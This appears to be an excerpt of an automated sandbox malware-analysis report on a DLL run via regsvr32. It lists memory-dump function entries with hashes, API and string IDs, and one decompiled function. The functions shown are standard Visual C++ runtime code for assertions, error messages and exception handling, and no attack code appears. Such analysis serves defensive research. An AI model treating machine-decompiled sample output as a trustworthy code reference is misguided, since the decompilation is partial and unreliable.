                                    • Opcode ID: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                    • Instruction ID: 3473a0eaf58d43c1d16632198f29a9e85fcf3b0d6ee31105f780c840bc6bd29d
                                    • Opcode Fuzzy Hash: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                    • Instruction Fuzzy Hash: 0E2148741087848FC398EF28C08A41BBBE0BB9C35CF400B1DF4CAA7265D7B8D6558B0A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2F7F1 Relevance: 79.1, APIs: 23, Strings: 22, Instructions: 376COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                    • API String ID: 242677333-579931786
                                    • Opcode ID: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                    • Instruction ID: e2526957761dd222599413fd0adc35655d47e080d41718875d9293ce759d4dec
                                    • Opcode Fuzzy Hash: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                    • Instruction Fuzzy Hash: FC32E83290CA8695E7B0CB18EC543EE73A0F784345FA04126D6CD47AA9DB7EE549CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2B470 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$FileModuleName
                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                    • API String ID: 1949418964-1840610800
                                    • Opcode ID: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                    • Instruction ID: 897ec7a8548006b51d3f4e24293aa6cb0eb1e7b087e1f77fa43b78bf07c27b58
                                    • Opcode Fuzzy Hash: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                    • Instruction Fuzzy Hash: 32F1F636609BC294EAB4CB54E8483AEB3E4F384780F604125DACD43BB9DB7ED185CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2AE40 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 207COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$_invalid_parameter
                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                    • API String ID: 2356156361-2279852085
                                    • Opcode ID: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                    • Instruction ID: d03840f3f998d79993f45302fffdb67e29e7bb822786765b29bb528846abb06c
                                    • Opcode Fuzzy Hash: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                    • Instruction Fuzzy Hash: 9DC1E87250DBC681E7B48B15E8403EEA3E1F389784F614126E6CD42BA9DB7ED155CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2CB4F Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 174fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileHandleWrite
                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                    • API String ID: 3320372497-2837547082
                                    • Opcode ID: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                    • Instruction ID: 981f8f0912e596e51d2e9e4fc62e3c1b144262c9e2c6e30392df3237f0075012
                                    • Opcode Fuzzy Hash: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                    • Instruction Fuzzy Hash: 9491FE31A1CA8685EBA0DB64E8943BE63E0F384784F604126D6CD47AB9DF3FE545CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D312E3 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 102libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                    • API String ID: 2574300362-564504941
                                    • Opcode ID: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                    • Instruction ID: ae2d570b6cae00db451c80d1d2e323a85726552741c7696ed6bf884c957359fe
                                    • Opcode Fuzzy Hash: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                    • Instruction Fuzzy Hash: 0F51A735A08A8286E7A09B19FC5476E73E4F784751F605035DACE43A74DF7EE488CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D376C0 Relevance: 33.3, APIs: 22, Instructions: 322COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                    • String ID:
                                    • API String ID: 641786319-0
                                    • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                    • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                    • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                    • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D340B0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 341COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
				long long _v24;
				long long _v32;
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				void* _v88;
				void* _v96;
				intOrPtr _v104;
				void* _v112;
				intOrPtr _v120;
				void* _v128;
				char _v132;
				char _v136;
				long long _v144;
				signed int _v152;
				char _v160;
				signed char _v164;
				signed int _v168;
				char _v176;
				char _v184;
				long long _v192;
				signed char _v200;
				long long _v208;
				signed int _v216;
				signed int _v224;
				long long _v232;
				void* _t222;
				void* _t244;
				void* _t295;
				long long _t302;
				long long _t303;
				intOrPtr _t311;
				long long _t312;
				long long _t321;
				intOrPtr _t325;
				long long _t329;
				long long _t330;
				long long _t332;

				_t295 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v164 = 0;
				_v152 = 0;
				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
				r9d = _v168;
				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
				r9d = _v168;
				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
				goto 0xf9d34197;
				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
				goto 0xf9d341b6;
				_t222 = E000007FE7FEF9D2CF80(_a40);
				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
				_t302 = _a8;
				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
				0xf9d24000();
				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
				goto 0xf9d34862;
				0xf9d24000();
				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
				_a8 = _t303;
				0xf9d24000();
				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
				_v164 = 1;
				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
				goto 0xf9d34295;
				E000007FE7FEF9D2CF80(_a8);
				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
				_t311 = _a8;
				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
				E000007FE7FEF9D2CF80(_t311);
				0xf9d24000();
				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
				0xf9d24000();
				_t312 =  *((intOrPtr*)(_t311 + 0x108));
				_v144 = _t312;
				0xf9d24000();
				 *((long long*)(_t312 + 0x108)) = 0;
				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
				goto 0xf9d34398;
				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
				E000007FE7FEF9D35AB0(1, _a8);
				E000007FE7FEF9D34870( &_v56, "bad exception");
				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a160);
				goto 0xf9d34398;
				E000007FE7FEF9D2CF50(_t312);
				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
				if (_a40[3] <= 0) goto 0xf9d3466c;
				_v216 = _a32;
				_v224 =  &_v132;
				_t321 =  &_v136;
				_v232 = _t321;
				r9d = _v168;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v128 = _t321;
				goto 0xf9d3447e;
				_v136 = _v136 + 1;
				_v128 = _v128 + 0x14;
				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
				_t325 = _v128;
				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
				goto 0xf9d3445a;
				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
				_v120 =  *((intOrPtr*)(_v128 + 0xc));
				_v120 = _v120 - 1;
				_t329 = _v112 + 0x14;
				_v112 = _t329;
				if (_v120 <= 0) goto 0xf9d34667;
				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
				_v96 = _t330;
				E000007FE7FEF9D2E6A0(_t244, _t330);
				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
				goto 0xf9d3457e;
				_v104 = _v104 - 1;
				_t332 = _v96 + 4;
				_v96 = _t332;
				if (_v104 <= 0) goto 0xf9d34662;
				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
				_v88 = _t332 +  *_v96;
				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
				goto 0xf9d3455a;
				_v152 = 1;
				_v176 = _a48 & 0x000000ff;
				_v184 = _v164 & 0x000000ff;
				_v192 = _a64;
				_v200 = _a56;
				_v208 = _v128;
				_v216 = _v88;
				_v224 = _v112;
				_v232 = _a40;
				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
				goto 0xf9d34667;
				goto 0xf9d3455a;
				goto L1;
				goto 0xf9d3445a;
				__eax = _v152 & 0x000000ff;
				__eflags = _v152 & 0x000000ff;
				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a40;
				__eax =  *_a40;
				__eax =  *_a40 & 0x1fffffff;
				__eflags = __eax - 0x19930521;
				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				_v32 = __rax;
				goto 0xf9d346cb;
				_v32 = 0;
				__eflags = _v32;
				if (_v32 == 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				__rax = __rax + _a40[8];
				_v24 = __rax;
				goto 0xf9d34712;
				_v24 = 0;
				__rdx = _v24;
				__rcx = _a8;
				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
				__eflags = __al & 0x000000ff;
				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a16;
				_v64 = _a16;
				__r9 =  &_v80;
				__r8 = _a40;
				__rdx = _a32;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
				_v64 = __rax;
				_v72 = 0;
				__eax = _a48 & 0x000000ff;
				_v200 = __al;
				__rax = _a32;
				_v208 = _a32;
				__rax = _a40;
				_v216 = _a40;
				_v224 = 0xffffffff;
				_v232 = 0;
				__r9 = _v64;
				__r8 = _a24;
				__rdx = _a8;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
				goto 0xf9d3484c;
				__rax = _a40;
				__eflags =  *(__rax + 0xc);
				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
				__eax = _a48 & 0x000000ff;
				__eflags = _a48 & 0x000000ff;
				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
				__rax = _a64;
				_v208 = _a64;
				__eax = _a56;
				_v216 = _a56;
				__eax = _v168;
				_v224 = _v168;
				__rax = _a40;
				_v232 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
				goto 0xf9d3484c;
				__eax = E000007FE7FEF9D2CF50(__rax);
				0xf9d24000();
				__eflags =  *((long long*)(__rax + 0x108));
				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
				goto 0xf9d34862;
				return E000007FE7FEF9D2CF80(__rax);
			}










































                                    0x7fef9d340b0
                                    0x7fef9d340b0
                                    0x7fef9d340b5
                                    0x7fef9d340ba
                                    0x7fef9d340bf
                                    0x7fef9d340cb
                                    0x7fef9d340d0
                                    0x7fef9d340ea
                                    0x7fef9d3410b
                                    0x7fef9d34131
                                    0x7fef9d34133
                                    0x7fef9d3414d
                                    0x7fef9d34152
                                    0x7fef9d3416f
                                    0x7fef9d34174
                                    0x7fef9d34193
                                    0x7fef9d3419c
                                    0x7fef9d341ad
                                    0x7fef9d341af
                                    0x7fef9d341b1
                                    0x7fef9d341c4
                                    0x7fef9d341d6
                                    0x7fef9d341eb
                                    0x7fef9d341fc
                                    0x7fef9d3420d
                                    0x7fef9d34213
                                    0x7fef9d34220
                                    0x7fef9d34226
                                    0x7fef9d34233
                                    0x7fef9d34235
                                    0x7fef9d3423a
                                    0x7fef9d3423f
                                    0x7fef9d34246
                                    0x7fef9d3424e
                                    0x7fef9d3425a
                                    0x7fef9d34262
                                    0x7fef9d34273
                                    0x7fef9d3428c
                                    0x7fef9d3428e
                                    0x7fef9d34290
                                    0x7fef9d342a3
                                    0x7fef9d342b1
                                    0x7fef9d342c2
                                    0x7fef9d342d3
                                    0x7fef9d342e4
                                    0x7fef9d342e6
                                    0x7fef9d342f3
                                    0x7fef9d342f5
                                    0x7fef9d342fa
                                    0x7fef9d34307
                                    0x7fef9d3430d
                                    0x7fef9d34312
                                    0x7fef9d34319
                                    0x7fef9d3431e
                                    0x7fef9d34323
                                    0x7fef9d34345
                                    0x7fef9d34347
                                    0x7fef9d34358
                                    0x7fef9d34364
                                    0x7fef9d34378
                                    0x7fef9d3438c
                                    0x7fef9d34391
                                    0x7fef9d34393
                                    0x7fef9d343a6
                                    0x7fef9d343b8
                                    0x7fef9d343cd
                                    0x7fef9d343de
                                    0x7fef9d343ef
                                    0x7fef9d34401
                                    0x7fef9d3440f
                                    0x7fef9d3441c
                                    0x7fef9d34421
                                    0x7fef9d34429
                                    0x7fef9d3442e
                                    0x7fef9d34433
                                    0x7fef9d3444b
                                    0x7fef9d34450
                                    0x7fef9d34458
                                    0x7fef9d34463
                                    0x7fef9d34476
                                    0x7fef9d3448c
                                    0x7fef9d344a0
                                    0x7fef9d344a2
                                    0x7fef9d344b1
                                    0x7fef9d344b3
                                    0x7fef9d344b5
                                    0x7fef9d344c9
                                    0x7fef9d344dc
                                    0x7fef9d344ee
                                    0x7fef9d344fd
                                    0x7fef9d34501
                                    0x7fef9d34511
                                    0x7fef9d34517
                                    0x7fef9d3452c
                                    0x7fef9d34531
                                    0x7fef9d34539
                                    0x7fef9d34551
                                    0x7fef9d34558
                                    0x7fef9d34563
                                    0x7fef9d34572
                                    0x7fef9d34576
                                    0x7fef9d34586
                                    0x7fef9d3458c
                                    0x7fef9d3459f
                                    0x7fef9d345ca
                                    0x7fef9d345cc
                                    0x7fef9d345ce
                                    0x7fef9d345db
                                    0x7fef9d345e4
                                    0x7fef9d345f0
                                    0x7fef9d345fc
                                    0x7fef9d34608
                                    0x7fef9d34615
                                    0x7fef9d34622
                                    0x7fef9d3462f
                                    0x7fef9d34654
                                    0x7fef9d3465b
                                    0x7fef9d3465d
                                    0x7fef9d34662
                                    0x7fef9d34667
                                    0x7fef9d3466c
                                    0x7fef9d34671
                                    0x7fef9d34673
                                    0x7fef9d34679
                                    0x7fef9d34681
                                    0x7fef9d34683
                                    0x7fef9d34688
                                    0x7fef9d3468d
                                    0x7fef9d34693
                                    0x7fef9d3469b
                                    0x7fef9d3469f
                                    0x7fef9d346a1
                                    0x7fef9d346ae
                                    0x7fef9d346b5
                                    0x7fef9d346bd
                                    0x7fef9d346bf
                                    0x7fef9d346cb
                                    0x7fef9d346d4
                                    0x7fef9d346da
                                    0x7fef9d346e2
                                    0x7fef9d346e6
                                    0x7fef9d346e8
                                    0x7fef9d346f5
                                    0x7fef9d346f9
                                    0x7fef9d346fc
                                    0x7fef9d34704
                                    0x7fef9d34706
                                    0x7fef9d34712
                                    0x7fef9d3471a
                                    0x7fef9d34727
                                    0x7fef9d3472a
                                    0x7fef9d3472c
                                    0x7fef9d34732
                                    0x7fef9d3473a
                                    0x7fef9d34742
                                    0x7fef9d3474a
                                    0x7fef9d34752
                                    0x7fef9d3475a
                                    0x7fef9d34762
                                    0x7fef9d34767
                                    0x7fef9d3476f
                                    0x7fef9d3477b
                                    0x7fef9d34783
                                    0x7fef9d34787
                                    0x7fef9d3478f
                                    0x7fef9d34794
                                    0x7fef9d3479c
                                    0x7fef9d347a1
                                    0x7fef9d347a9
                                    0x7fef9d347b2
                                    0x7fef9d347ba
                                    0x7fef9d347c2
                                    0x7fef9d347ca
                                    0x7fef9d347d2
                                    0x7fef9d347d7
                                    0x7fef9d347d9
                                    0x7fef9d347e1
                                    0x7fef9d347e5
                                    0x7fef9d347e7
                                    0x7fef9d347ef
                                    0x7fef9d347f1
                                    0x7fef9d347f3
                                    0x7fef9d347fb
                                    0x7fef9d34800
                                    0x7fef9d34807
                                    0x7fef9d3480b
                                    0x7fef9d3480f
                                    0x7fef9d34813
                                    0x7fef9d3481b
                                    0x7fef9d34820
                                    0x7fef9d34828
                                    0x7fef9d34830
                                    0x7fef9d34838
                                    0x7fef9d34840
                                    0x7fef9d34845
                                    0x7fef9d34847
                                    0x7fef9d3484c
                                    0x7fef9d34851
                                    0x7fef9d34859
                                    0x7fef9d3485b
                                    0x7fef9d34869

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                    • String ID: bad exception$csm$csm$csm
                                    • API String ID: 3498492519-820278400
                                    • Opcode ID: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                    • Instruction ID: 7a4295b2110f602878fc3b4740f95154d7254c41b9f584a981bc20edbc55875e
                                    • Opcode Fuzzy Hash: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                    • Instruction Fuzzy Hash: 6D12D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

